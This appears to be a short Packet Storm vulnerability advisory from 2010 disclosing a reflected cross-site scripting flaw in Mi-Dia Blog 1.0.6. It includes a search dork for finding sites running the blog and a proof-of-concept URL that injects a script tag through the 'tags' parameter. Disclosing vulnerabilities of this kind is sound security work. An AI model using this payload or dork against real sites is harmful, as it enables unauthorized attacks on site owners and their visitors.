Mi-Dia 1.0.6 Cross Site Scripting

2010-04-06T00:00:00
ID PACKETSTORM:88055
Type packetstorm
Reporter ItSecTeam
Modified 2010-04-06T00:00:00

Description

                                        
                                            `##############################################################################  
#Title: Mi-Dia Blog 1.0.6 XSS #  
#Vendor: http://www.mi-dia.co.uk #  
#Dork: "Powered by Mi-Dia Blog v1.0.6" #  
##############################################################################  
#AUTHOR: ITSecTeam #  
#Email: Bug@ITSecTeam.com #  
#Website: http://www.itsecteam.com #  
#Forum : http://forum.ITSecTeam.com #  
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability33.htm #  
#Thanks: r3dm0v3, Pejvak, am!rkh@n & everyone in the world :D #  
##############################################################################  
  
  
#POC:#########################################################################  
http://site.com/?s=search&tags=<script>alert(1)</script>  
`